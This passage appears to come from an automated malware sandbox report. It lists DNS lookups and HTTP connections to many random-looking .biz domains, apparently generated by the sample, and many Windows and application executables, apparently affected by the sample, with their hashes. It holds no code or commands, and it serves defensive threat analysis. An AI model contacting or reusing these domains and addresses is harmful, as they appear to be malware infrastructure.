| US | 72.52.179.174:80 | ww99.przvgke.biz | tcp |
| US | 76.223.26.96:80 | ww12.przvgke.biz | tcp |
| US | 8.8.8.8:53 | zlenh.biz | udp |
| US | 8.8.8.8:53 | knjghuig.biz | udp |
| US | 8.8.8.8:53 | 96.26.223.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| SG | 18.141.10.107:80 | knjghuig.biz | tcp |
| SG | 18.141.10.107:80 | knjghuig.biz | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | uhxqin.biz | udp |
| US | 8.8.8.8:53 | anpmnmxo.biz | udp |
| US | 8.8.8.8:53 | lpuegx.biz | udp |
| RU | 82.112.184.197:80 | lpuegx.biz | tcp |
| RU | 82.112.184.197:80 | lpuegx.biz | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| RU | 82.112.184.197:80 | lpuegx.biz | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vjaxhpbji.biz | udp |
| RU | 82.112.184.197:80 | vjaxhpbji.biz | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| RU | 82.112.184.197:80 | vjaxhpbji.biz | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xlfhhhm.biz | udp |
| SG | 47.129.31.212:80 | xlfhhhm.biz | tcp |
| US | 8.8.8.8:53 | 212.31.129.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ifsaia.biz | udp |
| SG | 13.251.16.150:80 | ifsaia.biz | tcp |
| US | 8.8.8.8:53 | saytjshyf.biz | udp |
| US | 44.221.84.105:80 | saytjshyf.biz | tcp |
| US | 8.8.8.8:53 | vcddkls.biz | udp |
| SG | 18.141.10.107:80 | vcddkls.biz | tcp |
| US | 8.8.8.8:53 | 150.16.251.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fwiwk.biz | udp |
| US | 172.234.222.143:80 | fwiwk.biz | tcp |
| US | 8.8.8.8:53 | ww99.fwiwk.biz | udp |
| US | 72.52.179.174:80 | ww99.fwiwk.biz | tcp |
| US | 8.8.8.8:53 | ww7.fwiwk.biz | udp |
| US | 199.59.243.227:80 | ww7.fwiwk.biz | tcp |
| US | 8.8.8.8:53 | tbjrpv.biz | udp |
| IE | 34.246.200.160:80 | tbjrpv.biz | tcp |
| US | 8.8.8.8:53 | 143.222.234.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.243.59.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | deoci.biz | udp |
| US | 34.227.7.138:80 | deoci.biz | tcp |
| US | 8.8.8.8:53 | gytujflc.biz | udp |
| US | 208.100.26.245:80 | gytujflc.biz | tcp |
| US | 8.8.8.8:53 | 160.200.246.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.7.227.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | qaynky.biz | udp |
| SG | 13.251.16.150:80 | qaynky.biz | tcp |
| US | 8.8.8.8:53 | 245.26.100.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pywolwnvd.biz | udp |
| US | 54.244.188.177:80 | pywolwnvd.biz | tcp |
| US | 8.8.8.8:53 | ssbzmoy.biz | udp |
| SG | 18.141.10.107:80 | ssbzmoy.biz | tcp |
| US | 8.8.8.8:53 | cvgrf.biz | udp |
| US | 54.244.188.177:80 | cvgrf.biz | tcp |
| US | 8.8.8.8:53 | npukfztj.biz | udp |
| US | 44.221.84.105:80 | npukfztj.biz | tcp |
| US | 8.8.8.8:53 | przvgke.biz | udp |
| US | 172.234.222.143:80 | przvgke.biz | tcp |
| US | 8.8.8.8:53 | ww99.przvgke.biz | udp |
| US | 72.52.179.174:80 | ww99.przvgke.biz | tcp |
| US | 8.8.8.8:53 | ww12.przvgke.biz | udp |
| US | 76.223.26.96:80 | ww12.przvgke.biz | tcp |
| US | 8.8.8.8:53 | ww7.przvgke.biz | udp |
| US | 199.59.243.227:80 | ww7.przvgke.biz | tcp |
| US | 8.8.8.8:53 | zlenh.biz | udp |
| US | 8.8.8.8:53 | knjghuig.biz | udp |
| SG | 18.141.10.107:80 | knjghuig.biz | tcp |
| US | 8.8.8.8:53 | uhxqin.biz | udp |
| US | 8.8.8.8:53 | anpmnmxo.biz | udp |
| US | 8.8.8.8:53 | lpuegx.biz | udp |
| RU | 82.112.184.197:80 | lpuegx.biz | tcp |
| RU | 82.112.184.197:80 | lpuegx.biz | tcp |
| US | 8.8.8.8:53 | vjaxhpbji.biz | udp |
| RU | 82.112.184.197:80 | vjaxhpbji.biz | tcp |
Files
memory/1980-0-0x0000000000400000-0x00000000006B5000-memory.dmp
memory/1980-1-0x00000000006C0000-0x0000000000720000-memory.dmp
memory/1980-7-0x00000000006C0000-0x0000000000720000-memory.dmp
memory/1980-8-0x00000000006C0000-0x0000000000720000-memory.dmp
C:\Windows\System32\alg.exe
| MD5 | 4f7904bda711c36768d34b3ad59964f2 |
| SHA1 | 116e69639019b9708871dccc8b654dfa1eb5bf96 |
| SHA256 | 53333002949335d69e6207fd038c744a99cd21749df7e770e36d5b0305e431a4 |
| SHA512 | 1ec9425da41eb73b7d6dea63eeb49d982c43e0a99244e7e2e520c8d1bc3951d4a1cd4149d9ec0fb293d1f8d17c76decf8bf02b7ce195f000021be7b7b4e0017b |
memory/4500-22-0x0000000000690000-0x00000000006F0000-memory.dmp
memory/4500-21-0x0000000140000000-0x0000000140148000-memory.dmp
memory/4500-13-0x0000000000690000-0x00000000006F0000-memory.dmp
C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
| MD5 | 012e9792a27d3a9d97e656d86d63b652 |
| SHA1 | ff4eb3b8415b56e9d236e1af5ddf6061d817d18a |
| SHA256 | d4b676a792f0716dc51fdad510244b4ea89c0c150297a1c04e396cd7a7571254 |
| SHA512 | 9e88b1378cd45c5d9c1918a9647cd15539a51021cf18321d0ca19cc61fb78ee1025c609b340d3575f80f2d0e60e2d037d12c3e54816f6504d4696ff0214f7a2a |
memory/4252-27-0x0000000140000000-0x0000000140147000-memory.dmp
memory/4252-28-0x0000000000700000-0x0000000000760000-memory.dmp
memory/4252-34-0x0000000000700000-0x0000000000760000-memory.dmp
C:\Windows\System32\FXSSVC.exe
| MD5 | 7048f5d7c5ac64a2cb6bf3461bddc6f8 |
| SHA1 | ff863ed3372e0302a6a76f85b3731ce018196783 |
| SHA256 | 5323d37aab4071503401d45ee06c5823b75eb9ec473b1ac478c585cd0189fb32 |
| SHA512 | c79e31320c0fd3aeaae41362ba2d2fa3c1f9352de1dabb7d31fb6d33585a311bbe6117d0669ea9c25ae1533d8fb08af82dceadd9b78e0d93cc932d0094bad7ad |
memory/3376-38-0x0000000140000000-0x0000000140135000-memory.dmp
memory/3376-39-0x0000000000830000-0x0000000000890000-memory.dmp
memory/3376-45-0x0000000000830000-0x0000000000890000-memory.dmp
C:\Windows\System32\GameInputSvc.exe
| MD5 | 22bc1132252173d21882c7e44f90d134 |
| SHA1 | 69b5f46066f3ea006bdad6042699051734833808 |
| SHA256 | 5c5e08b96edac27400d8f12cf681f567aa51e0e4d874bed17c2bd023f5ff35aa |
| SHA512 | 63e8f910f7836cfe2879cdee17ca95e6c83e7cc0be1c2dff74c8fd63e8217f2dacdd0f0f3da29de2ab33451d09f72a66e74e2e8811adb03653927734d00e4fc7 |
memory/4588-50-0x0000000140000000-0x000000014013D000-memory.dmp
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
| MD5 | a6531e63df6733eb8ba1997159418051 |
| SHA1 | 8e70218ed79af49f7d85d7c4cdc1efcf67febd92 |
| SHA256 | 613dc7ca31a739a6985e0f7e122b18bd50a9a7c09f094b857cda24ab1ec1f7c8 |
| SHA512 | 88b3c265169827dbfd90cf77567bb46eff049d47bbdee17a682be3b0708c1b038f960cf29ab6799b1b0b9c0aab417f53109d79498579982b2156d8efc14d43bb |
memory/3376-67-0x0000000000830000-0x0000000000890000-memory.dmp
memory/3376-66-0x0000000140000000-0x0000000140135000-memory.dmp
memory/1816-68-0x0000000140000000-0x0000000140234000-memory.dmp
memory/1768-65-0x0000000140000000-0x000000014013D000-memory.dmp
memory/1980-62-0x0000000000400000-0x00000000006B5000-memory.dmp
memory/1816-60-0x0000000000C40000-0x0000000000CA0000-memory.dmp
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe
| MD5 | c457b4c9044b1dc4d96faf6bfb1d6b6d |
| SHA1 | 02e8067f05a53096fad9e99f81b3b2babdc03965 |
| SHA256 | ef4c75655def6a20809955419d320eb93177544f6aec95fb4561c491ca27c72e |
| SHA512 | b3ed9c17eb192a3ab07ff63a5068082f00b989b3b1d834c298fd64a2ab909c3f8edf83d61b69e8e51cc47a21b8dbac3408bc04d2a2e93d542c19035692fdb139 |
memory/1816-54-0x0000000000C40000-0x0000000000CA0000-memory.dmp
memory/3712-79-0x0000000140000000-0x000000014022B000-memory.dmp
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
| MD5 | 184aef862527cf3856f015dc20b9ce85 |
| SHA1 | 9a62a0d6773810212d09bae6d75947b3981a9da9 |
| SHA256 | e640502c9bd1ccb5a00c9c998910bfe04646f60f0dea9aa60ce67e20e93640b7 |
| SHA512 | 330700f1ca68fd91550b88b662a37fad330e4d91d48961e32a19b271bd476ef377757548750e86782f53a838700291a13fc03e9778ac0f7c1f7cf70ad266df06 |
memory/4752-95-0x0000000140000000-0x000000014016E000-memory.dmp
C:\Windows\System32\msdtc.exe
| MD5 | 19f218f1c1248846d61f3b9131a09e7f |
| SHA1 | 62afa56248fb316adcd8f6658cf330ba89223493 |
| SHA256 | 0f3ccf33e88f6440b137eac3150fc7df69244202f5c5071fd6e2cb18ab5afdda |
| SHA512 | 09a403da0efffac95ab093099c3440146622bd4c5123e4838d05ed9a2006fb6925edec6aed70305af5f3b730a335751fb0c7c8105f4963f62ff96a2d25f2ffe6 |
memory/4612-97-0x0000000000D70000-0x0000000000DD0000-memory.dmp
memory/4752-93-0x0000000000C00000-0x0000000000C60000-memory.dmp
memory/4500-90-0x0000000140000000-0x0000000140148000-memory.dmp
C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE
| MD5 | 9e21e7973cd4ddfb5d72c8bba1367bf1 |
| SHA1 | 2d1db3cbd009473346b49b24a762a0b0caa60077 |
| SHA256 | 59a719994ec713d62d91c5856eaa42927c44bc0369087aa2c87a6b0c4210f465 |
| SHA512 | e52d638d8731fe64d99a764ccf0ba1343f893619c2af4d183eb707ee8596ceb034e1762db860c44181cc2e5ef14e828784e7ea209ff30c0fff62c895a2bdee71 |
C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
| MD5 | ddfb83be3c82beb0f58e63038cc10e98 |
| SHA1 | 22666426297ce625829b121e9a59e6c7a55715cb |
| SHA256 | daa51069d05003398096e9742a79f94cfea66a99ca963e85efbde7711710337f |
| SHA512 | f33eebc34aec978679ed70dccac96498c13083762257d2a5c2a8cf2775b09c717d6f9931c7b373e0d28fd957c78267be760e1fcb25ef3c53ea6d9a8676df8951 |
C:\Windows\SysWOW64\perfhost.exe
| MD5 | 410f8b9d946192c41bf1b332d7443354 |
| SHA1 | 32a79d3045e0f8fd7adba50fcfb223e0b1e9603f |
| SHA256 | 96b46e74d94806195433d3f05bf8bb8892ef9dc7653bf875bc42bf9384dd195a |
| SHA512 | f12e9f33cefb6177bdeb3a370d25c16bf4fff5e0584135f8ffe6f07d6d12eb270bcb6476c8b3100e8be2d439897887d46ec606ee107fd293ff6f59bc6b34b52d |
C:\Windows\System32\Locator.exe
| MD5 | ccab74b1960f84a489b318bcda93c31e |
| SHA1 | 489995d669969d9c65ee4837434e25e7932bb2f1 |
| SHA256 | 201cb6b70574c1f62ddd47815ed6ba66c82c76622193bacfd26d0d116e087b51 |
| SHA512 | 91b2bec94758d42b1575c2935ccdabde5c0071f82dbd30d2f492442c3cb6061c5dc149a5e8a5b35624d5db9202266e6003f3d1e08351007af9e50f90eb2bc6f6 |
C:\Windows\System32\SensorDataService.exe
| MD5 | 6c4ee5b0994f60228cf2e428a800841b |
| SHA1 | 84ba9afec5b1c5d4ff81bb0dc84fa6391a7f3954 |
| SHA256 | d90c00d3682e5e70ca49f6407be694bb9c22a62a39d84a2febde828ca2ef8915 |
| SHA512 | 1f72973b178cea0de35ef96222fd6e463f5ef11d71d297c169f154a6cf9f602ece03b89081183e8c105862646621d6b4b4e7b6bad9c119e90849adf42a4755b3 |
memory/4752-88-0x0000000000C00000-0x0000000000C60000-memory.dmp
C:\Windows\System32\snmptrap.exe
| MD5 | 9c2597ef204f6fd252fb0ccbbf5dbf6b |
| SHA1 | a97e97ed659404a7c60a3887f4189efbdcc40fc4 |
| SHA256 | 33d4644567ef4df6236573f39d9409ed7cd4eb5c6c854e5c3e583c4f19391d96 |
| SHA512 | b6aed92296c832bf436b5ca913f425ed16bf31206a9910d65b8aeb513ea219c5864e2cb607fde1d049607093daffe694fcd7ec95c22392c089bf81be98d04400 |
memory/4752-82-0x0000000000C00000-0x0000000000C60000-memory.dmp
memory/2268-164-0x0000000140000000-0x0000000140149000-memory.dmp
memory/5060-166-0x0000000140000000-0x0000000140133000-memory.dmp
memory/4612-169-0x0000000140000000-0x000000014015F000-memory.dmp
memory/332-168-0x0000000140000000-0x0000000140134000-memory.dmp
memory/2332-167-0x0000000140000000-0x00000001401D7000-memory.dmp
memory/1428-165-0x0000000000400000-0x0000000000535000-memory.dmp
memory/3268-156-0x0000000140000000-0x000000014016E000-memory.dmp
memory/3712-77-0x00000000001A0000-0x0000000000200000-memory.dmp
memory/3712-71-0x00000000001A0000-0x0000000000200000-memory.dmp
C:\Windows\System32\Spectrum.exe
| MD5 | 59c34d5143b6c9043e45e552a12c84fa |
| SHA1 | 760de71aea32eca5e961823eba4bd99f9ea97147 |
| SHA256 | 033f23c2e1ee118aa4f6fc68702eb604b5ea7f6dad926537cf3fcdc963bd23d3 |
| SHA512 | 0be431278c952c1aa49f44ea42d82656025644901d07ca3f1e6e706f56b82d92785013a3cad40ad204f054dce879300bac32fef29e509ba2454ce9043a0d2233 |
memory/3872-173-0x0000000140000000-0x0000000140169000-memory.dmp
memory/4252-172-0x0000000140000000-0x0000000140147000-memory.dmp
C:\Windows\System32\OpenSSH\ssh-agent.exe
| MD5 | d205b9c6b5917e9d6b717ec5959ee681 |
| SHA1 | efd7be1338695cdaa7a8c2e1e009f70a6d386db3 |
| SHA256 | 1a6c8d2d0ebdea7cc9efe97829644968a1df84f031ae2304d4645bf82a540eea |
| SHA512 | c291ff93fcd25bdc75d575a0a3af1bc6b174c4615c10286775f68539b310ce1bb89bb6a8f4c0c88542cc670f7e6d0764d2f826a92defa0cfe0bdb7833b957485 |
memory/648-194-0x0000000140000000-0x00000001401A1000-memory.dmp
C:\Windows\System32\TieringEngineService.exe
| MD5 | 674909d3e77d68aa73e6514d3f487860 |
| SHA1 | a8b66bd0b56df0e15de59f201fa6c30c27f23687 |
| SHA256 | cf04fc0abf8dc7a63cbf2b4bea48db9dd0122ed062066c1ba1c8027133da00a4 |
| SHA512 | 9c74cf6d6244c2ca7680a90c9f27155339fac1398c9bbc390bd4cbbe3bcfe27ba81c51aa1bcc81dbc8872884ad1b0d35ced8a6d4a2e9f0f32830c0ef49e6f555 |
memory/1688-201-0x0000000140000000-0x0000000140180000-memory.dmp
C:\Windows\System32\AgentService.exe
| MD5 | 8fd09bb358925d1c625dc60256c58783 |
| SHA1 | 0c5b6eba20bb88fb902e15a5fe0950c2d6a2bdad |
| SHA256 | cc077a553dc0090d44aad5378b530cb854f20edc5be9e28aa5077fd66d755d66 |
| SHA512 | c2bbf90dfe17c3555310ce49ed285c3e1857863abc7c36a99e7c82654770421d08237412378929be92ebb60034bbcc82d9d421e0622df9c43385ede8c15f40c3 |
memory/4596-208-0x0000000140000000-0x00000001401BD000-memory.dmp
memory/4596-219-0x0000000140000000-0x00000001401BD000-memory.dmp
memory/4588-222-0x0000000140000000-0x000000014013D000-memory.dmp
memory/4640-223-0x0000000140000000-0x0000000140144000-memory.dmp
C:\Windows\System32\vds.exe
| MD5 | 71903afee6cf81493e8fd7ba9b7c334a |
| SHA1 | a74d779603fde201b28622b915183b5e120615e5 |
| SHA256 | 36c7bcc17d947bb2f29493e700ba568a3601b1a1ace11705453a5c41e85cd6fb |
| SHA512 | 3237d206a8f274d9953ee289d2cd7c578a049fcd014bf4f728054c46a63f6184ee1323a294a5ae5a7bc61077b2142007fd66fb03eaf9e80285e78d9409658480 |
C:\Windows\System32\VSSVC.exe
| MD5 | 183fd88561558757682f6fddd0ca06c6 |
| SHA1 | dc72003cdb7ff0e6d9e1d1200ccfa2a0662280f4 |
| SHA256 | bec0f3e66a94969f7004106f1a21dcac5ebfc8ffbb2c49c9b1cd954ddc8538c9 |
| SHA512 | a03e82186964e0ecbea00bd9cdcec851ad90d027d906a3f39b479bc7e9d7659ee067fa11d7c6d481b08225f9dbafd4fb0bbc07ac2c79446998f1d4f5594fc5a5 |
memory/1292-243-0x0000000140000000-0x0000000140200000-memory.dmp
memory/1816-245-0x0000000140000000-0x0000000140234000-memory.dmp
memory/3712-246-0x0000000140000000-0x000000014022B000-memory.dmp
C:\Windows\System32\wbengine.exe
| MD5 | da4feb93fdf9f5b83e7c7cc79935f0c2 |
| SHA1 | 9c20b02a7ca5a6ce2e75762a961ea6265cda4bb9 |
| SHA256 | ef9b01f207822a60da377e2e85c5968cdc1fd27071b5822d2eb9472230d08d66 |
| SHA512 | 30ee27dc20ae28f8180afb668f4619230e8f75bc80d5136db9d957d82471fdab7742f3b90446a1e0ec35ca865152132d794749513c27541e52bd242edd245ea5 |
memory/4532-255-0x0000000140000000-0x0000000140216000-memory.dmp
C:\Windows\System32\wbem\WmiApSrv.exe
| MD5 | 5ad73bed49d034c4cef1833eff13d37e |
| SHA1 | 37345aa9a848f936d0a2fa85fc1aaffc7833804c |
| SHA256 | 3786a28c394d1560880c0d00373e26ff83966f69a9b347c43362ee2ffe081039 |
| SHA512 | 1447dc965f90c9fcd5e0b495a02334b9ecdcd2816092075cb36e5bc81544308b02101429bebe3908572601d88d6348bee3f18b54e6c4338bc4d576058a42a85f |
memory/564-259-0x0000000140000000-0x0000000140164000-memory.dmp
C:\Windows\System32\SearchIndexer.exe
| MD5 | e1266fae24bfcb3b93c0f09c47e466ee |
| SHA1 | 146286453113840b6e244182e28e9cdd4bc1aa01 |
| SHA256 | 6b1d4b5892d692c2d04575485b18127847ab06ca8d40c3c5650530f9768e61a3 |
| SHA512 | 81cd0b93fc6232cfdb4ba6806191c01691575a5371de9214f5a4411b56b2110fe7fa912fc054af5a2e5d52b119397c25be9db2242b16cbe88462e1a2b8caf95b |
memory/2216-280-0x0000000140000000-0x0000000140179000-memory.dmp
memory/332-279-0x0000000140000000-0x0000000140134000-memory.dmp
memory/3872-433-0x0000000140000000-0x0000000140169000-memory.dmp
memory/648-450-0x0000000140000000-0x00000001401A1000-memory.dmp
memory/1688-452-0x0000000140000000-0x0000000140180000-memory.dmp
memory/2332-458-0x0000000140000000-0x00000001401D7000-memory.dmp
memory/4640-459-0x0000000140000000-0x0000000140144000-memory.dmp
C:\Windows\system32\AppVClient.exe
| MD5 | c4afd16534c096f1eed0ef8738b76ddf |
| SHA1 | 98ec3ba859b5d99581748487799f15484c08d9ba |
| SHA256 | 814410a6f6d672ece3e28f58ea3ec1ee685ddae337d14c382e26eb0407fa8db7 |
| SHA512 | 96705f9be5b4a5b3bed9da65359c7615f29ef4302cb1d40b40b2b33a0536e4db9fc087cb1470359fb1c3afe55bcec22a9607d738f249a05d7e6d20da88a48edb |
C:\Windows\system32\SgrmBroker.exe
| MD5 | dd455a57e0f93183d9a543ea7bc06ce5 |
| SHA1 | 4b389e043d531fdf93ae51bd30b422ea5bda3e6f |
| SHA256 | 52c46c153dc03f74967aeada3da25c2c595051e6ae66fb8bcdbd4386f8746017 |
| SHA512 | f34aaa5c5389fad2b4ee092784409b0d6e3736a27b339d67f9df0278f6e4ff3a0976a5002db72241c6c6664583370d1a68aa91c06189141f8ce3bfdde5e443db |
C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
| MD5 | 64fa996cda60010ce71b038eb4e6104f |
| SHA1 | 43cb437e1aaa00c7b3b1b978d7396da275030c2b |
| SHA256 | 29a4fe1b24333099596d2476d15011189e1bc8a018b5268b500daf0b9f1f87e1 |
| SHA512 | bfdcf78c583cd57d81affda8de3ed992b33f917db6644adbaf22e9fb35929fb3c42210904a08bad0c0bb1f9db07e15cf9071ad123f36682d33d8368c44d548d4 |
C:\Windows\system32\msiexec.exe
| MD5 | 2df5cf6215e19fca6e6510e265aa0110 |
| SHA1 | 3a47bae38ccf10689a27ae904f22a4aaacb22b51 |
| SHA256 | 55cb13867ec4b8ef65324e75b0eaa70d6f87661fc66af37b58ead212609bb6f8 |
| SHA512 | cf75001f88fa7e6f53d11cabfa56e656db13abf5b6b7ff360d37ddb414aa0af8cb9ade406ebc863081bd2cee0b81c91bfd560ae0632d0607eb3e19c90323a0a5 |
C:\Program Files\Windows Defender\NisSrv.exe
| MD5 | 3d36474e1d9d08068d3742f049931e48 |
| SHA1 | 1cf04ea77fa7f538e28a46bd657415f5245d172e |
| SHA256 | dd1b252c26f89c115184994e560d4ac0bb259c2c626576b76686cbda11f3123f |
| SHA512 | 2730a03a4bc61f8cafe06ddc1517b203474d704350d5af75c78b72726fbd7262c264ca5c3a34fa85b8880e1e3d806be409acc2e49841a218f647416c4f5a56a0 |
C:\Program Files\7-Zip\7z.exe
| MD5 | 62e9a56937160d9fc80f2226074de4d4 |
| SHA1 | 784a9a12d63adbfef954a51da7ca9452f3325690 |
| SHA256 | 5486c648fbdf9ce6613f7827cfd6c5e5e89ea435460581653a7272ea0e01f06f |
| SHA512 | 04deb992229d3b146ddacaf06c4b5319c570bec0cd16e3976f1d24d27ba4a3370b86b7816d8960180772788f764370ae09bd7d1f73222ed8d23c4bad7e749ab8 |
C:\Program Files\Windows Media Player\wmpnetwk.exe
| MD5 | 5736c4f14e30e41da68033ab60f52355 |
| SHA1 | 6554b9a1ad40d6e2b6a70a2776ffec0fb6f5f164 |
| SHA256 | ab079a0e26b6d7e9c56d6742bdb49e71b90d2c9c88077d4834889d1ed65fdad8 |
| SHA512 | ff285018dc2d6f6489222bb006a8a4f7054a99876c6c0756ef8dfddcf838194b4c0408eddd2dec80adad3d7e4956c09e179a7e5393ef88ec69b4adf614a56cee |
C:\Program Files\7-Zip\7zG.exe
| MD5 | de76ca1fcc954ab723ba5d1ee86bba90 |
| SHA1 | d353252c0c48af2a95d12464f7133c64db59a91e |
| SHA256 | b96f0d8d3f14ae5ff4b432d17926f8f66b4f2e18e79808945fa538833b8c5a91 |
| SHA512 | 8dc101a4ed96884611910e4b26d32ff5dd69f99431dcd345cab3f08198eb3047653b9b50a7f69b5487936f11140965e486835a88466f9da4edfe463726f5c093 |
C:\Program Files\7-Zip\7zFM.exe
| MD5 | 1bf486a28289c84a8bdbecceb8b51a4d |
| SHA1 | c00232c1d853d12fb93e8fc5325978c9aa6e5e57 |
| SHA256 | de48513a41ae4cd57a48b96979e7fa1bd4162e05594770f11a29cbdef21ceec1 |
| SHA512 | de0196eaa7c04a5423ec2879484585993854546a7cd150b7d895db6fa38bca3b61b715c7b8f29f5bb0bc636ceeda2959e3e60b70ad2f3503d490c406c17660e8 |
memory/1292-497-0x0000000140000000-0x0000000140200000-memory.dmp
C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
| MD5 | 81adaf67907282e6b3122fc5faae25d3 |
| SHA1 | 98ed2e119ce537963e524854133cd2db72491d4a |
| SHA256 | 6244f74149b0199009c7869e8a1520d89e9ef510493f83d6864a50fe91bc1b44 |
| SHA512 | b8dad8e0df4ee2399418dac0be4ed62fdd1b167c33464bba90c677a5c6ac69058af2643f360237ed9e5324cce043b1f2cec00cbc36111645b61cb7b90772453c |
C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
| MD5 | 2e478ec2f9bf3b62751e41d1074daa64 |
| SHA1 | 490eb6760f5b931488998062d157540fd2b6a207 |
| SHA256 | c63d2fda5aaa9419a53c9fbcb8006d2b004dae6bac0deff82c4fff5a9a3dc884 |
| SHA512 | 1c5dc3b816a2b262fd1754569501293fb8dc51d24eb60ed89e5d33fc67a070499073fca764677f9ca48acf939a2e8c8145171e4f037a2b1bbca9d73558a90261 |
C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe
| MD5 | 18700ea8316c1d7d4c2f376c9a48dcc2 |
| SHA1 | 8df4b5c222366c21176961a2112560211c094edd |
| SHA256 | c3a60af3178b1dc64914bbf1f739bc5ad17df8bf104e48ef3e571299cc94cdcb |
| SHA512 | d77d6f1ac980bafc0a8289ee73261fde71e1f2b3c527f7d07eb2590207f784748d6618115829f785b30159d2ee6ca4f80551262ccba49ea91f927019417ab3ef |
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
| MD5 | 4be6f8ba3f9fefa5acb0bd55ec34586f |
| SHA1 | b9cc05bd0bd9c5a29249a42eb578fa04f4e4396a |
| SHA256 | 6118e8757e53d60c3854de38d195b5b0475afeb63813a2e012dc4efeaa0b19c9 |
| SHA512 | 2d6930be68991bfab1874afbcdead65f8e26f8c9b6e3c12028bb1f995e00ee82b23051cb350e6c1c0614659f9f70a962b31b94579aa5354c83a2aefb3ac2d8f4 |
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrmstp.exe
| MD5 | fe417ff2934357d59191a992f97f05fa |
| SHA1 | a8ebbe295dc9af1266469032b2c4be0ccfeb45f2 |
| SHA256 | a561ea23afb87905e1c0f41a391812c0ac8d8a80464a0c449f59df05b581fa5e |
| SHA512 | 42012b1a72b9305c8a6bd57efe14c7901b0d9585c02318955aa9dedd1c8d3fc7b02afd19dfa0e06638d23b44425ff6fd7312b0730f3c0c917e5913d5a893ab72 |
C:\Program Files\Google\Chrome\Application\123.0.6312.123\chrome_pwa_launcher.exe
| MD5 | 428279033e18fa4b0552d2bc3d67c9f9 |
| SHA1 | 361628d3e8411b3e9c31413312d5b34f4c5d345f |
| SHA256 | c41c00527673f5093158ba0b9a282200fd91cb3b6d050f57fe6858c9346499e6 |
| SHA512 | 9babeaf5576bb7faa7335be7ad0180894ad218aaff608c048ec7659476e56bf69aa3af149de478528f3a22daf7388cdc4e04b6e85b78130b7e6f0b8de1c41cea |
C:\Program Files\dotnet\dotnet.exe
| MD5 | da6c093d3de37934967b9c7124d4ad6c |
| SHA1 | b10954e0b450c9b5980eacc7a187b74b5f1d893c |
| SHA256 | 04c730ae57962149c4437ac53b2f21466a6abadf0caa3fbb16f6d66f84392ede |
| SHA512 | a6f31da69317e507d4500894ae057e3245b09508e6f5ceed64c925d3676a86d4cb14c10bc58953b2e1f09ef5ee6b08dadf71c35058bf55f286192b83963a1ff6 |
C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE
| MD5 | 11b0bddf069f7d93585fb3cb004e7f1c |
| SHA1 | 55e1730096b6ed5ffc663d598f4bec14bbd22cc8 |
| SHA256 | e0d8c0be3369eb97b851a647cf6a5740bbb37aab6520f7726f20f840aa31712f |
| SHA512 | e9d89d00c973eb251befffcdd48884e2d5423cd251b0b4fb50f23be0e5642463a2b4770939c17b7f1e2bbe42326a1c19939a21161f1ab7a73b2bc99582942af2 |
C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
| MD5 | 82c7cd25feded5c8edd45a2d4ee87ecf |
| SHA1 | 05a366181569265a6082c53e839cccb94e356e78 |
| SHA256 | 7af35872ba1b552e89e48bc7f56c3df965bf42b2527e11d851b3c275a2137642 |
| SHA512 | 1a5e8c1fbeaf6562b3ec44d6daf5b77026efb6d0603af0a0e9c97668e05f035118b1c2f0d6aa1e90df5f83487b84048f03838b54be54368612a16b0c0114f112 |
C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
| MD5 | 00e66ef256f3065e543eaad37a810d7b |
| SHA1 | 136e58c5ef04800df58be2a9c9cc0425b99cea81 |
| SHA256 | 6c68ee30e71dace7b706e7dcd481e357804c63a715d53217889c81da42d1dd94 |
| SHA512 | 69003900611dc8843785f734a8707079acb041d2f3e6a0057316e9cb6588a5c0a0f6b4856cba33a340fae89da56596fd034916a5aee408794eecd0028944e15b |
C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
| MD5 | 27ec0d2a02e4a431d087b4a4f0548027 |
| SHA1 | 65ada07b6cf86d76dafaca6b6feb8780c40fa030 |
| SHA256 | 221b4089c8a9dc35de33cc0cb5a1a6040f7f5798967329325392f6a933797a6d |
| SHA512 | d4512f46513c26b94b1651572e26beb5aa9bf7881e7d548d93e81bac5a1c68f724eded39b44f1bfeff0b1ed1e707508bd3dd9e42c33a00d5a86a2ed1cf84a112 |
C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
| MD5 | 4cf56dbe25c0dea1ba5772eda13980c7 |
| SHA1 | c7a8bf27f808fe03b933385b3eb56c3996f7768c |
| SHA256 | 3f2994a243ed0bec10e188354f1321ccf14d8a4f2a98c3b454362cc2d1e8a5de |
